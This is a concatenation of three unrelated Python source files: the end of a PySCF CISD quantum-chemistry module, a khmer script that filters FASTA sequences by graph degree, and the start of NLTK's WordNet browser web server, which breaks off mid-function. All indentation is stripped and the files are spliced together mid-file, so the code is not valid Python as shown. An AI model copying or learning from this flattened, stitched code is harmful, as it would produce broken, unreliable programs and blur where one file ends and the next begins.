bra_mat[0,0] = bra0
bra_mat[0,1:1+nov] = bra_mat[1:1+nov,0] = bra1.ravel()
bra_mat[0,1+nov:] = bra_mat[1+nov:,0] = bra2aa.ravel()
bra_mat[1:1+nov,1:1+nov] = bra2.transpose(0,2,1,3).reshape(nov,nov)
ket_mat = numpy.zeros((na,na))
ket_mat[0,0] = ket0
ket_mat[0,1:1+nov] = ket_mat[1:1+nov,0] = ket1.ravel()
ket_mat[0,1+nov:] = ket_mat[1+nov:,0] = ket2aa.ravel()
ket_mat[1:1+nov,1:1+nov] = ket2.transpose(0,2,1,3).reshape(nov,nov)
ovlp = lib.einsum('ab,ap,bq,pq->', bra_mat, trans, trans, ket_mat)
else:
nov1 = 1 + nov
noovv = bra2aa.size
bra_SS = numpy.zeros((nov1,nov1))
bra_SS[0,0] = bra0
bra_SS[0,1:] = bra_SS[1:,0] = bra1.ravel()
bra_SS[1:,1:] = bra2.transpose(0,2,1,3).reshape(nov,nov)
ket_SS = numpy.zeros((nov1,nov1))
ket_SS[0,0] = ket0
ket_SS[0,1:] = ket_SS[1:,0] = ket1.ravel()
ket_SS[1:,1:] = ket2.transpose(0,2,1,3).reshape(nov,nov)
trans_SS = numpy.empty((nov1,nov1))
trans_SD = numpy.empty((nov1,noovv))
trans_DS = numpy.empty((noovv,nov1))
occlist01 = occlists[:nov1]
for i, idx in enumerate(occlist01):
s_sub = s[idx].T.copy()
minors = s_sub[occlist01]
trans_SS[i,:] = numpy.linalg.det(minors)
minors = s_sub[occlist2]
trans_SD[i,:] = numpy.linalg.det(minors)
s_sub = s[:,idx].copy()
minors = s_sub[occlist2]
trans_DS[:,i] = numpy.linalg.det(minors)
ovlp = lib.einsum('ab,ap,bq,pq->', bra_SS, trans_SS, trans_SS, ket_SS)
ovlp+= lib.einsum('ab,a ,bq, q->', bra_SS, trans_SS[:,0], trans_SD, ket2aa.ravel())
ovlp+= lib.einsum('ab,ap,b ,p ->', bra_SS, trans_SD, trans_SS[:,0], ket2aa.ravel())
ovlp+= lib.einsum(' b, p,bq,pq->', bra2aa.ravel(), trans_SS[0,:], trans_DS, ket_SS)
ovlp+= lib.einsum(' b, p,b ,p ->', bra2aa.ravel(), trans_SD[0,:], trans_DS[:,0],
ket2aa.ravel())
ovlp+= lib.einsum('a ,ap, q,pq->', bra2aa.ravel(), trans_DS, trans_SS[0,:], ket_SS)
ovlp+= lib.einsum('a ,a , q, q->', bra2aa.ravel(), trans_DS[:,0], trans_SD[0,:],
ket2aa.ravel())
# FIXME: whether to approximate the overlap between double excitation coefficients
if numpy.linalg.norm(bra2aa)*numpy.linalg.norm(ket2aa) < 1e-4:
# Skip the overlap if coefficients of double excitation are small enough
pass
if (abs(numpy.linalg.det(s[:nocc,:nocc]) - 1) < 1e-2 and
abs(numpy.linalg.det(s[nocc:,nocc:]) - 1) < 1e-2):
# If the overlap matrix close to identity enough, use the <D|D'> overlap
# for orthogonal single-particle basis to approximate the overlap
# for non-orthogonal basis.
ovlp+= numpy.dot(bra2aa.ravel(), ket2aa.ravel()) * trans_SS[0,0] * 2
else:
from multiprocessing import sharedctypes, Process
buf_ctypes = sharedctypes.RawArray('d', noovv)
trans_ket = numpy.ndarray(noovv, buffer=buf_ctypes)
def trans_dot_ket(i0, i1):
for i in range(i0, i1):
s_sub = s[occlist2[i]].T.copy()
minors = s_sub[occlist2]
trans_ket[i] = numpy.linalg.det(minors).dot(ket2aa.ravel())
nproc = lib.num_threads()
if nproc > 1:
seg = (noovv+nproc-1) // nproc
ps = []
for i0,i1 in lib.prange(0, noovv, seg):
p = Process(target=trans_dot_ket, args=(i0,i1))
ps.append(p)
p.start()
[p.join() for p in ps]
else:
trans_dot_ket(0, noovv)
ovlp+= numpy.dot(bra2aa.ravel(), trans_ket) * trans_SS[0,0] * 2
return ovlp
def make_rdm1(myci, civec=None, nmo=None, nocc=None, ao_repr=False):
r'''
Spin-traced one-particle density matrix in MO basis (the occupied-virtual
blocks from the orbital response contribution are not included).
dm1[p,q] = <q_alpha^\dagger p_alpha> + <q_beta^\dagger p_beta>
The convention of 1-pdm is based on McWeeney's book, Eq (5.4.20).
The contraction between 1-particle Hamiltonian and rdm1 is
E = einsum('pq,qp', h1, rdm1)
'''
if civec is None: civec = myci.ci
if nmo is None: nmo = myci.nmo
if nocc is None: nocc = myci.nocc
d1 = _gamma1_intermediates(myci, civec, nmo, nocc)
return ccsd_rdm._make_rdm1(myci, d1, with_frozen=True, ao_repr=ao_repr)
def make_rdm2(myci, civec=None, nmo=None, nocc=None, ao_repr=False):
r'''
Spin-traced two-particle density matrix in MO basis
dm2[p,q,r,s] = \sum_{sigma,tau} <p_sigma^\dagger r_tau^\dagger s_tau q_sigma>
Note the contraction between ERIs (in Chemist's notation) and rdm2 is
E = einsum('pqrs,pqrs', eri, rdm2)
'''
if civec is None: civec = myci.ci
if nmo is None: nmo = myci.nmo
if nocc is None: nocc = myci.nocc
d1 = _gamma1_intermediates(myci, civec, nmo, nocc)
f = lib.H5TmpFile()
d2 = _gamma2_outcore(myci, civec, nmo, nocc, f, False)
return ccsd_rdm._make_rdm2(myci, d1, d2, with_dm1=True, with_frozen=True,
ao_repr=ao_repr)
def _gamma1_intermediates(myci, civec, nmo, nocc):
c0, c1, c2 = myci.cisdvec_to_amplitudes(civec, nmo, nocc)
dvo = c0.conj() * c1.T
dvo += numpy.einsum('jb,ijab->ai', c1.conj(), c2) * 2
dvo -= numpy.einsum('jb,ijba->ai', c1.conj(), c2)
dov = dvo.T.conj()
theta = c2*2 - c2.transpose(0,1,3,2)
doo = -numpy.einsum('ia,ka->ik', c1.conj(), c1)
doo -= lib.einsum('ijab,ikab->jk', c2.conj(), theta)
dvv = numpy.einsum('ia,ic->ac', c1, c1.conj())
dvv += lib.einsum('ijab,ijac->bc', theta, c2.conj())
return doo, dov, dvo, dvv
def _gamma2_intermediates(myci, civec, nmo, nocc, compress_vvvv=False):
f = lib.H5TmpFile()
_gamma2_outcore(myci, civec, nmo, nocc, f, compress_vvvv)
d2 = (f['dovov'][:], f['dvvvv'][:], f['doooo'][:], f['doovv'][:],
f['dovvo'][:], None, f['dovvv'][:], f['dooov'][:])
return d2
def _gamma2_outcore(myci, civec, nmo, nocc, h5fobj, compress_vvvv=False):
log = logger.Logger(myci.stdout, myci.verbose)
nocc = myci.nocc
nmo = myci.nmo
nvir = nmo - nocc
nvir_pair = nvir * (nvir+1) // 2
c0, c1, c2 = myci.cisdvec_to_amplitudes(civec, nmo, nocc)
h5fobj['dovov'] = (2*c0*c2.conj().transpose(0,2,1,3) -
c0*c2.conj().transpose(1,2,0,3))
doooo = lib.einsum('ijab,klab->ijkl', c2.conj(), c2)
h5fobj['doooo'] = doooo.transpose(0,2,1,3) - doooo.transpose(1,2,0,3)*.5
doooo = None
dooov = -lib.einsum('ia,klac->klic', c1*2, c2.conj())
h5fobj['dooov'] = dooov.transpose(0,2,1,3)*2 - dooov.transpose(1,2,0,3)
dooov = None
#:dvovv = numpy.einsum('ia,ikcd->akcd', c1, c2) * 2
#:dvvvv = lib.einsum('ijab,ijcd->abcd', c2, c2)
max_memory = max(0, myci.max_memory - lib.current_memory()[0])
unit = max(nocc**2*nvir*2+nocc*nvir**2*3 + 1, nvir**3*2+nocc*nvir**2 + 1)
blksize = min(nvir, max(BLKMIN, int(max_memory*.9e6/8/unit)))
log.debug1('rdm intermediates: block size = %d, nvir = %d in %d blocks',
blksize, nocc, int((nvir+blksize-1)/blksize))
dtype = numpy.result_type(civec).char
dovvv = h5fobj.create_dataset('dovvv', (nocc,nvir,nvir,nvir), dtype,
chunks=(nocc,min(nocc,nvir),1,nvir))
if compress_vvvv:
dvvvv = h5fobj.create_dataset('dvvvv', (nvir_pair,nvir_pair), dtype)
else:
dvvvv = h5fobj.create_dataset('dvvvv', (nvir,nvir,nvir,nvir), dtype)
for (p0, p1) in lib.prange(0, nvir, blksize):
theta = c2[:,:,p0:p1] - c2[:,:,p0:p1].transpose(1,0,2,3) * .5
gvvvv = lib.einsum('ijab,ijcd->abcd', theta.conj(), c2)
if compress_vvvv:
# symmetrize dvvvv because it does not affect the results of cisd_grad
# dvvvv = (dvvvv+dvvvv.transpose(0,1,3,2)) * .5
# dvvvv = (dvvvv+dvvvv.transpose(1,0,2,3)) * .5
# now dvvvv == dvvvv.transpose(0,1,3,2) == dvvvv.transpose(1,0,3,2)
tmp = numpy.empty((nvir,nvir,nvir))
tmpvvvv = numpy.empty((p1-p0,nvir,nvir_pair))
for i in range(p1-p0):
tmp[:] = gvvvv[i].conj().transpose(1,0,2)
lib.pack_tril(tmp+tmp.transpose(0,2,1), out=tmpvvvv[i])
# tril of (dvvvv[p0:p1,p0:p1]+dvvvv[p0:p1,p0:p1].T)
for i in range(p0, p1):
for j in range(p0, i):
tmpvvvv[i-p0,j] += tmpvvvv[j-p0,i]
tmpvvvv[i-p0,i] *= 2
for i in range(p1, nvir):
off = i * (i+1) // 2
dvvvv[off+p0:off+p1] = tmpvvvv[:,i]
for i in range(p0, p1):
off = i * (i+1) // 2
if p0 > 0:
tmpvvvv[i-p0,:p0] += dvvvv[off:off+p0]
dvvvv[off:off+i+1] = tmpvvvv[i-p0,:i+1] * .25
tmp = tmpvvvv = None
else:
for i in range(p0, p1):
dvvvv[i] = gvvvv[i-p0].conj().transpose(1,0,2)
gvovv = numpy.einsum('ia,ikcd->akcd', c1[:,p0:p1].conj()*2, c2)
gvovv = gvovv.conj()
dovvv[:,:,p0:p1] = gvovv.transpose(1,3,0,2)*2 - gvovv.transpose(1,2,0,3)
theta = c2*2 - c2.transpose(1,0,2,3)
doovv = numpy.einsum('ia,kc->ikca', c1.conj(), -c1)
doovv -= lib.einsum('kjcb,kica->jiab', c2.conj(), theta)
doovv -= lib.einsum('ikcb,jkca->ijab', c2.conj(), theta)
h5fobj['doovv'] = doovv
doovv = None
dovvo = lib.einsum('ikac,jkbc->iabj', theta.conj(), theta)
dovvo += numpy.einsum('ia,kc->iack', c1.conj(), c1) * 2
h5fobj['dovvo'] = dovvo
theta = dovvo = None
dvvov = None
return (h5fobj['dovov'], h5fobj['dvvvv'], h5fobj['doooo'], h5fobj['doovv'],
h5fobj['dovvo'], dvvov , h5fobj['dovvv'], h5fobj['dooov'])
def trans_rdm1(myci, cibra, ciket, nmo=None, nocc=None):
r'''
Spin-traced one-particle transition density matrix in MO basis.
dm1[p,q] = <q_alpha^\dagger p_alpha> + <q_beta^\dagger p_beta>
The convention of 1-pdm is based on McWeeney's book, Eq (5.4.20).
The contraction between 1-particle Hamiltonian and rdm1 is
E = einsum('pq,qp', h1, rdm1)
'''
if nmo is None: nmo = myci.nmo
if nocc is None: nocc = myci.nocc
c0bra, c1bra, c2bra = myci.cisdvec_to_amplitudes(cibra, nmo, nocc)
c0ket, c1ket, c2ket = myci.cisdvec_to_amplitudes(ciket, nmo, nocc)
dvo = c0bra.conj() * c1ket.T
dvo += numpy.einsum('jb,ijab->ai', c1bra.conj(), c2ket) * 2
dvo -= numpy.einsum('jb,ijba->ai', c1bra.conj(), c2ket)
dov = c0ket * c1bra.conj()
dov += numpy.einsum('jb,ijab->ia', c1ket, c2bra.conj()) * 2
dov -= numpy.einsum('jb,ijba->ia', c1ket, c2bra.conj())
theta = c2ket*2 - c2ket.transpose(0,1,3,2)
doo = -numpy.einsum('ia,ka->ik', c1bra.conj(), c1ket)
doo -= lib.einsum('ijab,ikab->jk', c2bra.conj(), theta)
dvv = numpy.einsum('ia,ic->ac', c1ket, c1bra.conj())
dvv += lib.einsum('ijab,ijac->bc', theta, c2bra.conj())
dm1 = numpy.empty((nmo,nmo), dtype=doo.dtype)
dm1[:nocc,:nocc] = doo * 2
dm1[:nocc,nocc:] = dov * 2
dm1[nocc:,:nocc] = dvo * 2
dm1[nocc:,nocc:] = dvv * 2
norm = dot(cibra, ciket, nmo, nocc)
dm1[numpy.diag_indices(nocc)] += 2 * norm
if myci.frozen is not None:
nmo = myci.mo_occ.size
nocc = numpy.count_nonzero(myci.mo_occ > 0)
rdm1 = numpy.zeros((nmo,nmo), dtype=dm1.dtype)
rdm1[numpy.diag_indices(nocc)] = 2 * norm
moidx = numpy.where(myci.get_frozen_mask())[0]
rdm1[moidx[:,None],moidx] = dm1
dm1 = rdm1
return dm1
def as_scanner(ci):
'''Generating a scanner/solver for CISD PES.
The returned solver is a function. This function requires one argument
"mol" as input and returns total CISD energy.
The solver will automatically use the results of last calculation as the
initial guess of the new calculation. All parameters assigned in the
CISD and the underlying SCF objects (conv_tol, max_memory etc) are
automatically applied in the solver.
Note scanner has side effects. It may change many underlying objects
(_scf, with_df, with_x2c, ...) during calculation.
Examples::
>>> from pyscf import gto, scf, ci
>>> mol = gto.M(atom='H 0 0 0; F 0 0 1')
>>> ci_scanner = ci.CISD(scf.RHF(mol)).as_scanner()
>>> e_tot = ci_scanner(gto.M(atom='H 0 0 0; F 0 0 1.1'))
>>> e_tot = ci_scanner(gto.M(atom='H 0 0 0; F 0 0 1.5'))
'''
from pyscf import gto
if isinstance(ci, lib.SinglePointScanner):
return ci
logger.info(ci, 'Set %s as a scanner', ci.__class__)
class CISD_Scanner(ci.__class__, lib.SinglePointScanner):
def __init__(self, ci):
self.__dict__.update(ci.__dict__)
self._scf = ci._scf.as_scanner()
def __call__(self, mol_or_geom, ci0=None, **kwargs):
if isinstance(mol_or_geom, gto.Mole):
mol = mol_or_geom
else:
mol = self.mol.set_geom_(mol_or_geom, inplace=False)
self.reset(mol)
mf_scanner = self._scf
mf_scanner(mol)
self.mo_coeff = mf_scanner.mo_coeff
self.mo_occ = mf_scanner.mo_occ
if getattr(self.ci, 'size', 0) != self.vector_size():
self.ci = None
if ci0 is None:
# FIXME: Whether to use the initial guess from last step?
# If root flips, large errors may be found in the solutions
ci0 = self.ci
self.kernel(ci0, **kwargs)[0]
return self.e_tot
return CISD_Scanner(ci)
class CISD(lib.StreamObject):
'''restricted CISD
Attributes:
verbose : int
Print level. Default value equals to :class:`Mole.verbose`
max_memory : float or int
Allowed memory in MB. Default value equals to
:class:`Mole.max_memory`
conv_tol : float
converge threshold. Default is 1e-9.
max_cycle : int
max number of iterations. Default is 50.
max_space : int
Davidson diagonalization space size. Default is 12.
direct : bool
AO-direct CISD. Default is False.
async_io : bool
Allow for asynchronous function execution. Default is True.
frozen : int or list
If integer is given, the inner-most orbitals are frozen from CI
amplitudes. Given the orbital indices (0-based) in a list, both
occupied and virtual orbitals can be frozen in CI calculation.
>>> mol = gto.M(atom = 'H 0 0 0; F 0 0 1.1', basis = 'ccpvdz')
>>> mf = scf.RHF(mol).run()
>>> # freeze 2 core orbitals
>>> myci = ci.CISD(mf).set(frozen = 2).run()
>>> # freeze 2 core orbitals and 3 high lying unoccupied orbitals
>>> myci.set(frozen = [0,1,16,17,18]).run()
Saved results
converged : bool
CISD converged or not
e_corr : float
CISD correlation correction
e_tot : float
Total CCSD energy (HF + correlation)
ci :
CI wavefunction coefficients
'''
conv_tol = getattr(__config__, 'ci_cisd_CISD_conv_tol', 1e-9)
max_cycle = getattr(__config__, 'ci_cisd_CISD_max_cycle', 50)
max_space = getattr(__config__, 'ci_cisd_CISD_max_space', 12)
lindep = getattr(__config__, 'ci_cisd_CISD_lindep', 1e-14)
level_shift = getattr(__config__, 'ci_cisd_CISD_level_shift', 0) # in preconditioner
direct = getattr(__config__, 'ci_cisd_CISD_direct', False)
async_io = getattr(__config__, 'ci_cisd_CISD_async_io', True)
def __init__(self, mf, frozen=None, mo_coeff=None, mo_occ=None):
if 'dft' in str(mf.__module__):
raise RuntimeError('CISD Warning: The first argument mf is a DFT object. '
'CISD calculation should be initialized with HF object.\n'
'DFT object can be converted to HF object with '
'the code below:\n'
' mf_hf = scf.RHF(mol)\n'
' mf_hf.__dict__.update(mf_dft.__dict__)\n')
if mo_coeff is None: mo_coeff = mf.mo_coeff
if mo_occ is None: mo_occ = mf.mo_occ
self.mol = mf.mol
self._scf = mf
self.verbose = self.mol.verbose
self.stdout = self.mol.stdout
self.max_memory = mf.max_memory
self.nroots = 1
self.frozen = frozen
self.chkfile = mf.chkfile
##################################################
# don't modify the following attributes, they are not input options
self.converged = False
self.mo_coeff = mo_coeff
self.mo_occ = mo_occ
self.e_corr = None
self.emp2 = None
self.ci = None
self._nocc = None
self._nmo = None
keys = set(('conv_tol', 'max_cycle', 'max_space', 'lindep',
'level_shift', 'direct'))
self._keys = set(self.__dict__.keys()).union(keys)
def dump_flags(self, verbose=None):
log = logger.new_logger(self, verbose)
log.info('')
log.info('******** %s ********', self.__class__)
log.info('CISD nocc = %s, nmo = %s', self.nocc, self.nmo)
if self.frozen is not None:
log.info('frozen orbitals %s', str(self.frozen))
log.info('max_cycle = %d', self.max_cycle)
log.info('direct = %d', self.direct)
log.info('conv_tol = %g', self.conv_tol)
log.info('max_cycle = %d', self.max_cycle)
log.info('max_space = %d', self.max_space)
log.info('lindep = %d', self.lindep)
log.info('nroots = %d', self.nroots)
log.info('max_memory %d MB (current use %d MB)',
self.max_memory, lib.current_memory()[0])
return self
@property
def e_tot(self):
return numpy.asarray(self.e_corr) + self._scf.e_tot
@property
def nstates(self):
return self.nroots
@nstates.setter
def nstates(self, x):
self.nroots = x
@property
def nocc(self):
return self.get_nocc()
@nocc.setter
def nocc(self, n):
self._nocc = n
@property
def nmo(self):
return self.get_nmo()
@nmo.setter
def nmo(self, n):
self._nmo = n
def vector_size(self):
'''The size of the vector which was returned from
:func:`amplitudes_to_cisdvec`
'''
nocc = self.nocc
nvir = self.nmo - nocc
return 1 + nocc*nvir + (nocc*nvir)**2
def reset(self, mol=None):
if mol is not None:
self.mol = mol
self._scf.reset(mol)
return self
get_nocc = ccsd.get_nocc
get_nmo = ccsd.get_nmo
get_frozen_mask = ccsd.get_frozen_mask
def kernel(self, ci0=None, eris=None):
return self.cisd(ci0, eris)
def cisd(self, ci0=None, eris=None):
if eris is None:
eris = self.ao2mo(self.mo_coeff)
if self.verbose >= logger.WARN:
self.check_sanity()
self.dump_flags()
self.converged, self.e_corr, self.ci = \
kernel(self, eris, ci0, max_cycle=self.max_cycle,
tol=self.conv_tol, verbose=self.verbose)
self._finalize()
return self.e_corr, self.ci
def _finalize(self):
citype = self.__class__.__name__
if numpy.all(self.converged):
logger.info(self, '%s converged', citype)
else:
logger.info(self, '%s not converged', citype)
if self.nroots > 1:
for i,e in enumerate(self.e_tot):
logger.note(self, '%s root %d E = %.16g', citype, i, e)
else:
logger.note(self, 'E(%s) = %.16g E_corr = %.16g',
citype, self.e_tot, self.e_corr)
return self
def get_init_guess(self, eris=None, nroots=1, diag=None):
'''
MP2 energy and MP2 initial guess(es) for CISD coefficients.
Kwargs:
eris : ccsd._ChemistsERIs (inheriting) object (poss diff for df)
Contains the various (pq|rs) integrals needed.
nroots : integer
Number of CISD solutions to be found.
diag : numpy array (1D)
e.g. CISD Hamiltonian diagonal in Slater determinant
space with HF energy subtracted.
Returns:
Tuple of float and numpy array or
tuple of float and list of numpy arrays (if nroots > 1)
MP2 energy and initial guess(es) for CISD coefficients.
'''
if eris is None: eris = self.ao2mo(self.mo_coeff)
nocc = self.nocc
mo_e = eris.mo_energy
e_ia = lib.direct_sum('i-a->ia', mo_e[:nocc], mo_e[nocc:])
ci0 = 1
ci1 = eris.fock[:nocc,nocc:] / e_ia
eris_ovvo = _cp(eris.ovvo)
ci2 = 2 * eris_ovvo.transpose(0,3,1,2)
ci2 -= eris_ovvo.transpose(0,3,2,1)
ci2 /= lib.direct_sum('ia,jb->ijab', e_ia, e_ia)
self.emp2 = numpy.einsum('ijab,iabj', ci2, eris_ovvo)
logger.info(self, 'Init t2, MP2 energy = %.15g', self.emp2)
if abs(self.emp2) < 1e-3 and abs(ci1).sum() < 1e-3:
# To avoid ci1 being stuck at local minimum
ci1 = 1e-1 / e_ia
ci_guess = amplitudes_to_cisdvec(ci0, ci1, ci2)
if nroots > 1:
civec_size = ci_guess.size
dtype = ci_guess.dtype
nroots = min(ci1.size+1, nroots) # Consider Koopmans' theorem only
if diag is None:
idx = range(1, nroots)
else:
idx = diag[:ci1.size+1].argsort()[1:nroots] # exclude HF determinant
ci_guess = [ci_guess]
for i in idx:
g = numpy.zeros(civec_size, dtype)
g[i] = 1.0
ci_guess.append(g)
return self.emp2, ci_guess
contract = contract
make_diagonal = make_diagonal
def _dot(self, x1, x2, nmo=None, nocc=None):
if nmo is None: nmo = self.nmo
if nocc is None: nocc = self.nocc
return dot(x1, x2, nmo, nocc)
def ao2mo(self, mo_coeff=None):
nmo = self.nmo
nao = self.mo_coeff.shape[0]
nmo_pair = nmo * (nmo+1) // 2
nao_pair = nao * (nao+1) // 2
mem_incore = (max(nao_pair**2, nmo**4) + nmo_pair**2) * 8/1e6
mem_now = lib.current_memory()[0]
if (self._scf._eri is not None and
(mem_incore+mem_now < self.max_memory) or self.mol.incore_anyway):
return ccsd._make_eris_incore(self, mo_coeff)
if getattr(self._scf, 'with_df', None):
logger.warn(self, 'CISD detected DF being used in the HF object. '
'MO integrals are computed based on the DF 3-index tensors.\n'
'It\'s recommended to use dfccsd.CCSD for the '
'DF-CISD calculations')
return ccsd._make_df_eris_outcore(self, mo_coeff)
return ccsd._make_eris_outcore(self, mo_coeff)
def _add_vvvv(self, c2, eris, out=None, t2sym=None):
return ccsd._add_vvvv(self, None, c2, eris, out, False, t2sym)
def to_fcivec(self, cisdvec, norb=None, nelec=None, frozen=None):
if norb is None: norb = self.nmo
if nelec is None: nelec = self.nocc*2
return to_fcivec(cisdvec, norb, nelec, frozen)
def from_fcivec(self, fcivec, norb=None, nelec=None):
if norb is None: norb = self.nmo
if nelec is None: nelec = self.nocc*2
return from_fcivec(fcivec, norb, nelec)
make_rdm1 = make_rdm1
make_rdm2 = make_rdm2
trans_rdm1 = trans_rdm1
as_scanner = as_scanner
def dump_chk(self, ci=None, frozen=None, mo_coeff=None, mo_occ=None):
if not self.chkfile:
return self
if ci is None: ci = self.ci
if frozen is None: frozen = self.frozen
# "None" cannot be serialized by the chkfile module
if frozen is None:
frozen = 0
ci_chk = {'e_corr': self.e_corr,
'ci': ci,
'frozen': frozen}
if mo_coeff is not None: ci_chk['mo_coeff'] = mo_coeff
if mo_occ is not None: ci_chk['mo_occ'] = mo_occ
if self._nmo is not None: ci_chk['_nmo'] = self._nmo
if self._nocc is not None: ci_chk['_nocc'] = self._nocc
lib.chkfile.save(self.chkfile, 'cisd', ci_chk)
def amplitudes_to_cisdvec(self, c0, c1, c2):
return amplitudes_to_cisdvec(c0, c1, c2)
def cisdvec_to_amplitudes(self, civec, nmo=None, nocc=None):
if nmo is None: nmo = self.nmo
if nocc is None: nocc = self.nocc
return cisdvec_to_amplitudes(civec, nmo, nocc)
def density_fit(self):
raise NotImplementedError
def nuc_grad_method(self):
from pyscf.grad import cisd
return cisd.Gradients(self)
class RCISD(CISD):
pass
from pyscf import scf
scf.hf.RHF.CISD = lib.class_as_method(RCISD)
scf.rohf.ROHF.CISD = None
def _cp(a):
return numpy.array(a, copy=False, order='C')
if __name__ == '__main__':
from pyscf import gto
from pyscf import ao2mo
mol = gto.Mole()
mol.verbose = 0
mol.atom = [
['O', ( 0., 0. , 0. )],
['H', ( 0., -0.757, 0.587)],
['H', ( 0., 0.757 , 0.587)],]
mol.basis = 'sto3g'
mol.build()
mf = scf.RHF(mol).run()
myci = CISD(mf)
eris = ccsd._make_eris_outcore(myci, mf.mo_coeff)
ecisd, civec = myci.kernel(eris=eris)
print(ecisd - -0.048878084082066106)
nmo = myci.nmo
nocc = myci.nocc
rdm1 = myci.make_rdm1(civec)
rdm2 = myci.make_rdm2(civec)
h1e = reduce(numpy.dot, (mf.mo_coeff.T, mf.get_hcore(), mf.mo_coeff))
h2e = ao2mo.kernel(mf._eri, mf.mo_coeff)
h2e = ao2mo.restore(1, h2e, nmo)
e2 = (numpy.einsum('ij,ji', h1e, rdm1) +
numpy.einsum('ijkl,ijkl', h2e, rdm2) * .5)
print(ecisd + mf.e_tot - mol.energy_nuc() - e2) # = 0
print(abs(rdm1 - numpy.einsum('ijkk->ji', rdm2)/(mol.nelectron-1)).sum())
|
split-fasta-on-degree-th.py | #! /usr/bin/env python
#
# This file is part of khmer, http://github.com/ged-lab/khmer/, and is
# Copyright (C) Michigan State University, 2009-2013. It is licensed under
# the three-clause BSD license; see doc/LICENSE.txt.
# Contact: khmer-project@idyll.org
#
import sys
import screed.fasta
import os
import khmer
import threading
import Queue
import gc
K = 31 # use K-1 for assembly K
HASHTABLE_SIZE = int(4e9)
N_HT = 4
###
MAX_DEGREE = 4
###
WORKER_THREADS = 8
GROUPSIZE = 100
class SequenceGroup(object):
def __init__(self, order, seqlist):
self.order = order
self.seqlist = seqlist
def process(inq, outq, ht):
global worker_count
while not done or not inq.empty():
try:
g = inq.get(True, 1)
except Queue.Empty:
continue
x = []
last_record = None
for record in g.seqlist:
name = record['name']
seq = record['sequence']
trim_seq, trim_at = ht.trim_on_degree(seq, MAX_DEGREE)
if trim_at > K:
x.append(record)
y = [(record['name'], record['sequence']) for record in x]
gg = SequenceGroup(g.order, y)
outq.put(gg)
gc.collect()
worker_count -= 1
def write(outq, outfp):
global worker_count
groups = {}
next_group = 0
while worker_count > 0 or not outq.empty():
try:
g = outq.get(True, 1)
except Queue.Empty:
continue
groups[g.order] = g
while next_group in groups:
g = groups[next_group]
for name, seq in g.seqlist:
outfp.write('>%s\n%s\n' % (name, seq,))
del groups[next_group]
next_group += 1
gc.collect()
if len(groups) > 20:
print 'WAITAMINIT: len(groups) is', len(groups)
def main():
global ht, done, worker_count
done = False
worker_count = 0
repfile = sys.argv[1]
infile = sys.argv[2]
outprefix = sys.argv[3]
lowfile = outprefix + '.low'
highfile = outprefix + '.high'
print 'saving low-density to:', lowfile
print 'saving high-density to:', highfile
print 'making hashtable'
ht = khmer.new_hashbits(K, HASHTABLE_SIZE, N_HT)
lowfp = open(lowfile, 'w')
# highfp = open(highfile, 'w')
print 'eating', repfile
ht.consume_fasta(repfile)
inqueue = Queue.Queue(50)
outqueue = Queue.Queue(50)
# worker and writer threads
for i in range(WORKER_THREADS):
t = threading.Thread(target=process, args=(inqueue, outqueue, ht))
worker_count += 1
t.start()
threading.Thread(target=write, args=(outqueue, lowfp)).start()
# main thread
x = []
i = 0
group_n = 0
for n, record in enumerate(
screed.fasta.fasta_iter(open(infile), parse_description=False)):
if n % 10000 == 0:
print '...', n
i += 1
if i > GROUPSIZE:
x.append(record)
g = SequenceGroup(group_n, x)
inqueue.put(g)
x = []
group_n += 1
i = 0
else:
x.append(record)
# submit last set of sequences
g = SequenceGroup(group_n, x)
inqueue.put(g)
done = True
main()
# vim: set ft=python ts=4 sts=4 sw=4 et tw=79:
|
wordnet_app.py | # Natural Language Toolkit: WordNet Browser Application
#
# Copyright (C) 2001-2013 NLTK Project
# Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
# Paul Bone <pbone@students.csse.unimelb.edu.au>
# URL: <http://www.nltk.org/>
# For license information, see LICENSE.TXT
"""
A WordNet Browser application which launches the default browser
(if it is not already running) and opens a new tab with a connection
to http://localhost:port/ . It also starts an HTTP server on the
specified port and begins serving browser requests. The default
port is 8000. (For command-line help, run "python wordnet -h")
This application requires that the user's web browser supports
Javascript.
BrowServer is a server for browsing the NLTK Wordnet database It first
launches a browser client to be used for browsing and then starts
serving the requests of that and maybe other clients
Usage::
browserver.py -h
browserver.py [-s] [-p <port>]
Options::
-h or --help
Display this help message.
-l <file> or --log-file <file>
Logs messages to the given file, If this option is not specified
messages are silently dropped.
-p <port> or --port <port>
Run the web server on this TCP port, defaults to 8000.
-s or --server-mode
Do not start a web browser, and do not allow a user to
shotdown the server through the web interface.
"""
# TODO: throughout this package variable names and docstrings need
# modifying to be compliant with NLTK's coding standards. Tests also
# need to be develop to ensure this continues to work in the face of
# changes to other NLTK packages.
from __future__ import print_function
# Allow this program to run inside the NLTK source tree.
from sys import path
import os
from sys import argv
from collections import defaultdict
import webbrowser
import datetime
import re
import threading
import time
import getopt
import base64
import pickle
import copy
from nltk import compat
from nltk.corpus import wordnet as wn
from nltk.corpus.reader.wordnet import Synset, Lemma
if compat.PY3:
from http.server import HTTPServer, BaseHTTPRequestHandler
else:
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
# now included in local file
# from util import html_header, html_trailer, \
# get_static_index_page, get_static_page_by_path, \
# page_from_word, page_from_href
firstClient = True
# True if we're not also running a web browser. The value f server_mode
# gets set by demo().
server_mode = None
# If set this is a file object for writting log messages.
logfile = None
class MyServerHandler(BaseHTTPRequestHandler):
def do_HEAD(self):
self.send_head()
def do_GET(self):
global firstClient
sp = self.path[1:]
if compat.unquote_plus(sp) == 'SHUTDOWN THE SERVER':
if server_mode:
page = "Server must be killed with SIGTERM."
type = "text/plain"
else:
print('Server shutting down!')
os._exit(0)
elif sp == '': # First request.
type = 'text/html'
if not server_mode and firstClient:
firstClient = False
page = get_static_index_page(True)
else:
page = get_static_index_page(False)
word = 'green'
elif sp.endswith('.html'): # Trying to fetch a HTML file TODO:
type = 'text/html'
usp = compat.unquote_plus(sp)
if usp == 'NLTK Wordnet Browser Database Info.html':
word = '* Database Info *'
if os.path.isfile(usp):
page = open(usp).read()
else:
page = (html_header % word) + \
'<p>The database info file:'\
'<p><b>' + usp + '</b>' + \
'<p>was not found. Run this:' + \
'<p><b>python dbinfo_html.py</b>' + \
'<p>to produce it.' + html_trailer
else:
# Handle files here.
word = sp
page = get_static_page_by_path(usp)
elif sp.startswith("search"):
# This doesn't seem to work with MWEs.
type = 'text/html'
parts = (sp.split("?")[1]).split("&")
word = [p.split("=")[1].replace("+", " ")
for p in parts if p.startswith("nextWord")][0]
page, word = page_from_word(word)
elif sp.startswith("lookup_"):
